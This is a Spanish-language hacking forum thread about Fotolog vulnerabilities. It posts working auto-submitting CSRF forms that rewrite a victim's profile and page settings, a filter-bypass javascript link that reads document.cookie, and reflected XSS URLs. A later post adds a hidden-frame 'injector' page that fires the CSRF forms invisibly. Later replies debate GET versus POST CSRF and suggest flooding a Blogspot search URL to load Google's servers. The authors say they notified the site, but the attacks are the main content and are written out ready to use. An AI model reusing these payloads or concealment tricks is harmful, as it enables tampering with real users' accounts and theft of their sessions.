Foro de elhacker.net

bueno bueno, que mas, les voy a contar TODO! porq quiero un post bien larguito xD! y en tambien esta en el blog este mismo post (osea apreto enviar, lo copio y pego en el blog xD!)

empiezo, taba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog(aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache yse podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa  ;-)) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.

entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...

1er formulario: (este modifica los datos personales...)

<body onload="document.update_prefs.submit()">
<form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data">
<input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true">
<input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!">
<input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false">
<input type="hidden" id="image" name="image" class="lg">
<input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32">
<input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32">
<input type="hidden" class="radio" name="gender" id="g_0" value="0">
<input type="hidden" class="radio" name="gender" id="g_1" value="1">
<input type="hidden" class="radio" name="gender" id="g_2" value="2">
<input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40">
<input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64">
<input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:plink:0">
<input type="hidden" class="checkbox" name="delete:new:plink:1">
<input type="hidden" name="new:plink:1" value="1">
<input type="hidden" id="country" name="country" value="_N">
<input type="hidden" id="state" name="state" value="00">
<input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!">
<input type="hidden" name="language" value="tr">
<input type="hidden" name="new:camera:0:type" value="3">
<input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P">
<input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32">
<input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32">
<input type="hidden" type="checkbox" name="delete:new:camera:0">
<input type="hidden" name="new:camera:0" value="1">
<input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!">
<input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)">
<input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!">
<input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64">
<input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:favlink:0">
<input type="hidden" name="new:favlink:0" value="1">
</form>
</body>

2do formulario: (este modifica los colores y titulo...)

<body onload="document.update_prefs.submit()">
<form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="title" value="Me cabieron el pote!">
<input type="hidden" name="margin_txt_color" value="FFFFFF">
<input type="hidden" name="margin_link_color" value="33FF00">
<input type="hidden" name="margin_bg_color" value="FFFF00">
<input type="hidden" name="text_color" value="FFFFFF">
<input type="hidden" name="hyperlink_text_color" value="FFFF00">
<input type="hidden" name="background_color" value="FFFF00">
</form>
</body>

3er formulario: (noticias por mail... "newlestter")

<body onload="document.update_prefs.submit()">
<form name="update_prefs" method="post" enctype="multipart/form-data" id="settings">
<input type="hidden" name="receive_email_digest" value="true">
<input type="hidden" name="receive_updates" value="true">
<input type="hidden" name="receive_newsletter" value="true">
<input type="hidden" name="receive_promotionals" value="true">
</form>
</body>

la verdad son re boludos, pero quiera uno o no! jajaj

---

Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)

bueno, en http://account.fotolog.com/profile (http://account.fotolog.com/profile) en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen javascript:alert(1); (http://caca) se los transforma en http://alert(1)/;  (http://alert(1)/;)entonces si ponemos javasjavascript:cript:alert(1); borra el javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".

---

XSS: (aca no tengo nada para poner :p)

muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E (http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E)

aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E (http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E)

---

bueno, este fue un capitulo de fede_castg, espero que les haya gustado y... chau. jajaj

Aviso que mande dos mails al webmaster, ahora q se jodan xD!

Agredecimiento a la maquina castg!, mira como quedaron los codes jajajaja, era un Quil0mbo al principio.

de verdad Te pasaste!!!

a ver cuando nos juntamos una vez mas y a la ***** con fotolog ajjajajja.


saludos gente!

PD. ya va en el blog con colorcito y todo

igualmente falto un toq de depuracion, pero como no es nada profesional esto de fotolog, y mis codigos tampoco xD! [indirecta!]

haha se pasan compañeros, buen trabajo por el review de fotolog

Saludos

muchas gracias anon, me motiva mucho que una persona como vos nos diga eso ^_^

Good Work!

---

Cuanto daria por tener un amigo, cerca de casa, para poder hablar, compatir información, ademas de realizar pruebas, los envidio... :P

jeje, si, sinceramente es necesario. fede estuvo de vacaciones cuando yo volvia de las mias, y cuando nos juntabamos todos los pibes, pe sentia un pelotudo hablando de informatica y que me pregunten que eraun linux ! :B jajjaj. epro no todo lo es la computacion, la amistad es mucho mas. (sono gay na?) xD

jajaja, si no conozco a muchos que se junten asi en una casa, se ocurren cosas muy buenas.!!


gracias por la buena onda


saludos

pero guarda porq aveces duele y no te podes sentar  :silbar:

:o

jajaj esta jodiendo shell root.


castg ese mismo dia que paso de todo, estaba muy gay a la noche nose nose duden ustedes.

fue se desvirtuo!


no mas posts jodiendo a la sexualidad de castg

saludos

jajaja buen trabajo ^^

la verdad que yo, al igual que shellroot, los envidio al poder compartir información en persona.


Como no, y siguiendo con mi espiritu... "criticista", he de hacer una sugerencia..., por qué os cuesta tanto escribir de una manera más legible? xD Supongo que será por cosas de costumbres, y por otra parte el hecho de ser de otro país el idioma al final termina "desvirtuándose" (que no tiene porque ser malo) pero la verdad es que cuesta a veces seguir los posts de los del otro lado del charco jaja


Un saludo y espero que no se lo tomen a mal =)

Muy bueno si. Fui yo quien posteó lo del csrf de borrar los comentarios en el fotolog (y he visto que ya lo han posteao en otras comunidades  :rolleyes:) y por eso me ha interesado mucho el post ^^

Sin duda fotolog.. está dejándose de usar, pero no por eso está libre de bugs xD

Enorabuena y saludos!

No estoy muy seguro como funciona  fotolog porque no lo uso pero tengo varias dudas acerca de XSRF/CSRF, aver para explotarlo es necesario que la vitcima vaya a la direccion del formulario o que ustedes usen un inframe para que cuando entre al blog se ejecute el CSRF, ps como no uso fotolog ps e gustaria que den un poco mas de info de la posible explotacion.

en estos casos son CSRF de formularios, es decir el atacante inserta en su web el código con un autosubmit y manda el link a los atacados, cuando éstos entren en el link (de la web del atacante), el formulario se envia(al fotolog) sin requerir un token y hace su magia

pero no tiene pq ser así, tambien hay csrf con peticiones GET en vez de POST

Eso no es CSRF de formularios, porque no existe CSRF de formulario, es un CSRF via POST.

fotolog es una web conocida y no creo que limiten a los usuarios a usar javascript para modificar sus webs, por eso hize el post anterior.

lo que dice tragantas esta perfecto, porq hay directamente un csrf en el link de la misma web vulnerable (por get) o tener que hacerlo por un formulario en web atacante y con auto submit o mucha ingenieria social.


te pido disculpas, es como vos decis, costumbre, pero mala costumbre, porq en un chat no hay reglas de ortografia, pero en el foro tendria que haberlas. tratare de escribir mejor xD! y sobre el dialecto tenes razon, porq los españoles dicen "como mola!" y te juro que noentiendo un carajo!! jajaj es mas, hace poco me entere que significaba "conio" por mi abuela gallega xD! bueno, espero que les alla gustado

voy a esperar que los de fotolog me respondan o por lo menos una semana para que "se venca el timepo de solicitud" asi explico bien bien como explotarlas. un saludo grande ;)

Lipman!: te felicito, no sabia que vos la habias encontrado ;-)

El ataque no es nada dificil una vez encontrado un bug, aunque tambien la ingenieria social (muy poca), es necesearia.


vos esos formularios que posteamos los agregas a una web tuya ej: archivo fotolog.html


haces un auto submit, con la propiedad <body onload ...>

el usuario tiene que estar logueado en fotolog SI o si, no hay otro posibilidad sin que la victima no este logueada ya en fotolog... como cualquier csrf.

una vez ingresado al formulario (yo con los valores cambiados obviamente.)


el auto submit no le deja ni poner cancelar a la vicitima y listo todos los valores cambiados.

esto se puede camuflar nose, ahora se me occure, haciendo una capa oculta y dentro de la capa un readfile(php), y ejecutar la web desde esa capa (no lo probe).



saludos!

yo etoy tratando de hacerlo con un frameset oculto, por ahora sirve para que no redireccione (en la barra de direcciones) a la pagina de fotolog, osea queda siempre "midominio.com/fotolog.htm"
pero ahora estoy viendo de que el frame sea invisible, sino lo logro lo hago bien chiquito asi no se sospecha xD! ademas se puede hacer un "<meta refresh" para que redireccione a google por ejemplo en 7 segundos, suficiente para que se cambien los datos....

Felicidades! Muy bueno xD
 
Castg prueba con un iframe, no se sí se le pueda dar en estilo invisible pero debe ser algo similar.
 
Prueba con iframe style="visible:false;"
 
Es un invento pero tal vez funcione xD

jejej, ya lo solucione. antes que nada quiero decir que el formulario para los "newlestter" no sirve, despues veo si lo puedo hacer andar. y segundo, aca tienen el codigo del "inyector xD!".
en el directorio donde pongan esto vana tener que tener el primer formulario y el segundo con los nombres foto.php y foto2.php. aca el codigo:

<html>
<head>
<title>El titulo (ingenieria social)</title>
</head>
  <frameset rows="100%,*">
    <frame name="principal" src="http://google.com.ar" marginwidth="10" marginheight="10" frameborder="0">
    <frame frame name="oculto" src="foto.php" scrolling="no" frameborder="0">
    <frame frame name="oculto2" src="foto2.php" scrolling="no" frameborder="0">
  <frameset>
<body>
</body>
</html>

y listo, como el primer frame ocupa el 100% de la pantalla, los otros quedan ocultos :p..., asi que se ejecutan los dos csrf de una sola vez, y la victima solo ve la pagina de google, nomas que con el nombre de tu dominio en la barra de direcciones. un saludo grande! ;-)

cuando dije "de formularios" me refería (obviamente) via post, quizá me expresé mal, pero quería que entendieses cuales son las 2 aplicaciones. POST = Formularios, GET = URL.
El tema del javascript, es que el javascript corre por parte del usuario...si navegas por una web que haga uso de este tipo de CSRF para cambiar datos es cosa tuya, no de Fotolog.


Un saludo mexicanitos :P jajaja =)

Get no es igual a URL, lo que hace GET es un QUERY_STRING (http://www.htmlpoint.com/cgi/cgi_11.htm)
Un CSRF via GET es casi siempre mas peligroso que un via POST, ya que un CSRF via POST es mas limitado a explotar que uno via GET, si fuera GET les dejas un comentario y si los comentarios usan BBcode puedes dejarlo asi Y al tratar de visualizar la imagen estaría enviando la peticion GET.

Los CSRF via POST son un poco muy complicado y a la vez simple, por ejemplo no es necesario que el vaya a la pagina que quiero para que ejecute el CSRF, porque si encuentro un XSS permanente puedo ejecutar un inframe y activarse al tratar de visualizarlo.

vamos a ver... jajaja estás muy puntilloso eh amigo xD
claro que get != url pero su principal aplicación es esa, vale que el bbcode tambien interprete, pero los bbforums representan un pequeño porcentaje respecto de todos los codes...

bueno, no digo más que capaz ers de corregirme hasta las tildes... jajajaja

un saludo :)

a ver yoya, voy a ser simple y exacto, dejate de romper las pelotas !  esta bien lo qe dijo tragantras, que get se trasporta por la uri o url, asi que post = formulario, get = url/uri. y lo que queremos decir con igual es por donde se pasa, asi que dejate de molestar por lo menos en mi post dale  ;D?


jajajaj capaz...

Aver, yo estoy aclarando algunas cosas que dijo tragantras y hice una pregunta y si no la aclaro pueden aver pregunta como:
¿Porque GET se transporta por url y POST se transporta por formularios, ya porque los metodos GET y POST son metodos de envio HTTP y en este caso se usa un formularios que se envia por metodos GET o POST pero los dos metodos se estan enviando por formularios ya que se declara el envio de informacion del formulario por metodo GET o POST y creo que los dos se envian por formulario y no uno por url y el otro por formulario?

pero estamos hablando que si tenes un csrf, y los datos pasan por get, lo haces dando la url y no dando el formulario que es mas dificl, igual con el metodo que di aca se hace mucho mas facil.

Aprende algunos conceptos, como seguro sabes que es una URL, aprende bien el conceptos de una peticion GET y POST.

pero yoya, ya esta, no desvirtuemos mas el tema (y hablen de los cositos que encotramos fede y yo xD!) no me importa el concepto tecnico de post y get, lo entiendo bastante bien. ademas si nos vamos a poner a definir tecnicamente cada ves que nombramos algo los teclados quedariannegros (si son blancos)

dos furmoulario, GET, POST? mira que yo nunca soy de pelear pero se ve que no tenes idea, el GET puede ser por formulario, nose si habras codeado alguna vez en php, pero sabras que el metodo post se utiliza cuando se hace un submit en un formulario unicamente, y el metodo get es el que se obtiene como bien dijo castg por una url (que obviamente no es la url la que tiene la informacion  :¬¬), no tiene nada que ver con un formulario, si se puede pasar luego de un form, pero no necesariamente como el metodo post

<?
session_start();
$var_session = md5(session_id());
echo '<a href=cerrarsesion.php?s='.$var_session.'>Cerrar sesion</a>';
?>

el md5 para que no me digan aaa el Sid se puede sacar .

en este caso es un anti csrf porque, esta obteniendo una variable que te da la propiedad session_id, que es casi imposible de sacar, en cambio un codigo vulnerable a csrf seria:

<?
session_start();
echo '<a href=cerrarsesion.php?s='nombre_del_usuario'>Cerrar sesion</a>';
?>

entonces se podria pasar por una web que se diriga a cerrarsesion.php?s='nombre_del_usuario', sabiendo el nombre del usuario, y seria de la misma peligrosidad que por el metodo post  ;)



listo posteen cosas coherentes gente

osea, un formulario por get lo que hace es mandar los datos por la url o uri, pero todo lo demas esta perfecto...

Yo codeo en perl y php... Los metodos GET, POST son metodos de peticion HTTP...

Para explotar CSRF inporta mucho el metodo GET o POST, ejemplo.

Si tienes una web vulnerable a CSRF via POST. El usuari de esa web esta limitado a usar BBCODES y las url pasan por referer y verifican si la url no es de la web la ps la deniega en cambio si es de la misma web  la acepta.

Por eso digo que para explotar un CSRF metodo POST es mas limitado.

yo como pastas y carnes, mi pileta es azul XD.


sinceramente que lindo lo que nos esformsamos con fede para hacer este post y que venga un tipo a desvirtuarlo por 2 paginas ni da. prq mejor se dejan de molestar, se las arreglan por mail, y comentan sobre NUESTRO post y nuestro tema, ya quede esto no tratamos de hablar de que es una p**a peticion http.

osea yoyahack, puede que sea mas limitado, pero en este caso no se da asique poasteaste al pedo que era menos peligroso que esto que lo otro.


saludoss

Yo no vengo a molestar a este foro, a mi solo me gusta colaborar y aveces aprendo cosas de los demas, pero Castg debes aprender a comportarte mejor.

Otra cosa, una cosa es molestar y otra debatir un tema, pero bueno no salte con las peticiones  HTTP porque se me ocurrió, solo porque tienen que ver con el tema, pero debes aceptar las buenas y las bajas.
Claro claro son buenos bug Castg, Felicidades ps.

bueno, gracias. solo digo que hagan otro tema para debatir, porq aca ponemos los bugs siendo xss y csrf, y metodos get  post no estan muy nombrados aca, asi que porfa la proxima hagan otro post ;)

sin ánimo ninguno de seguir desvirtuando este post, solo quería remarcar que el bypassing de el referer es cuestión trivial, es decir que la complicación de un csrf por post, quizá tan solo sea cuestion de ingeniera social, más que de problemas técnicos

un saludo y de nuevo felicidades por el descubrimiento =)

jejej muchas gracias. me gusto mucho la forma de usar el frame ya que puedes crear un dominio y poner un frame a google(visible) y otros a csrf(invisibles) ;) un saludo grande ;)

Lo agregué al post de recopilaciones, saludos  :D

Muchas gracais whk  ;-) ;-)

Muchas gracias  :laugh:


saludos

En register tambien hay XDD digo XSS :xD

http://tinyurl.com/ykca4pt

:S si esta lleno xD

conf ede le pedimos a fotolog a ver si nos podian poner nuestros nombres por uyn dia en la portada xD! me dijeron que no iba a ser posible lo que queriamos, pero les gusto mucho tener usauraios como nosotros "sigan disfrutando de fotolog" fue la utlima frase XD! el usuairo que me hice fue para hacer las pruebas xD! http://fotolog.com/castg y la unica foto q tiene es de elhacker.net xD!

ahora falta facebook xD aunque lo veo dificil :S

facebook debe tener alguno que otro xss. pero yo que se, por ejemplo tenes sqli en algunas apss, pero podes acceder solo a las tablas de ese ususrio de mysql o mssql. ademas, no slo se usar todavia, asi que nose xD! una vez que tenga ganas de abrirlo y aprender a usarlo podriamops ver algo xD! jajajaj, pero yo no lo quisiera ver.por ejemplo blogspot, ese si estaria bueno, pero es de google, asi que tambien lo veo dificil

blogspot tiene una pifia que permite ver todos los posts al mismo tiempo

Por ejemplo

http://joseluisavilaherrera.blogspot.com/search?updated-max=2010-01-22T13%3A57%3A00-08%3A00&max-results=99999

xD muestra los ultimos 99999 posts xD ahora si lo cargas unas 100.000 en 10 minutos tal vez le hagas cosquillas al servidor de google jajajajaja